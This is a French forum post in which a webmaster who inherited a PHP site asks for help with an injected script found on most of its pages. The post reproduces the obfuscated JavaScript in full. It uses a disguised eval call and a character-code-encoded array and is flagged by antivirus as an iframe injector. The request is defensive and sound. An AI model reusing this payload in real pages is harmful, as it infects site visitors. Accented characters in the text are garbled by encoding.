Discussion :

[pierrickj]

Bonjour � tous,

voila j'ai r�cup�r� actuellement un site internet cod� en php / html dont j'assure la gestion depuis peu.

Bref quelques mois apr�s cette passation et n'ayant pas eu le temps de remettre le code au propre (car oui je n'adh�re pas du tout � cette gestion multi "include" de site, aucune hierarchie entre les pages bref...)

Ce qui devait arriver arriva, je pense que le site a �t� victime d'injection de code. (sql, include, get / post ?)

Pour le coup j'ai transvas� mon site sur un autre serveur ou je peux eplucher les logs au d�tail.

Toutefois voici le code que j'ai retrouv� sur la majorit� des pages .php du site :

Code :

S�lectionner tout - Visualiser dans une fen�tre � part

<script>try{asdwqe();}catch(qw){f=(q)?"fromCharCode":2;try{eval("a=prototype");}catch(zxc){e=window["eva"+"l"];n="104.90.800.999.792.1053.872.909.880.1044.368.1071.912.945.928.909.320.351.480.945.816.1026.776.981.808.288.920.1026.792.549.272.936.928.1044.896.522.376.423.824.1035.856.909.960.459.384.414.840.990.376.945.880.414.792.927.840.567.448.306.256.990.776.981.808.549.272.756.952.945.928.1044.808.1026.272.288.920.891.912.999.864.972.840.990.824.549.272.873.936.1044.888.306.256.918.912.873.872.909.784.999.912.900.808.1026.488.306.880.999.272.288.776.972.840.927.880.549.272.891.808.990.928.909.912.306.256.936.808.945.824.936.928.549.272.450.272.288.952.945.800.1044.832.549.272.450.272.558.480.423.840.918.912.873.872.909.496.351.328.531.104.90".split(".");h=2;s="";if(window.document)for(i=0;-158+i<0;i=1+i){k=i;s=s+String[f](n[k]/(i%(h)+8));}e(s);}}</script>

Toutefois je suis pas un grand mordu du javascript donc j'aimerai obtenir votre avis sur ce code. Son r�le, et �ventuellement d�celer une URL encod�e dans ce bloc.

Pour informations ce code me fait gueuler la plupart des AV avec la d�nomination suivante :

JS:iframe-qq

Je pense que ce code inclue une page distante truff�e de scripts � la c*n...

J'aimerai donc votre avis, votre exp�rience sur ce bout de code si quelqu'un l'a d�j� vu, ou qui saurait �ventuellement la nature de la faille �a pourrait m'aider.

En attendant j'vais passer � la loupe l'ensemble des champs de formulaire afin de valider qu'il n'y ait pas d'injection sql possible (dumoins via des bots qui passent leurs journ�e � scanner des serveurs).

Par avance merci.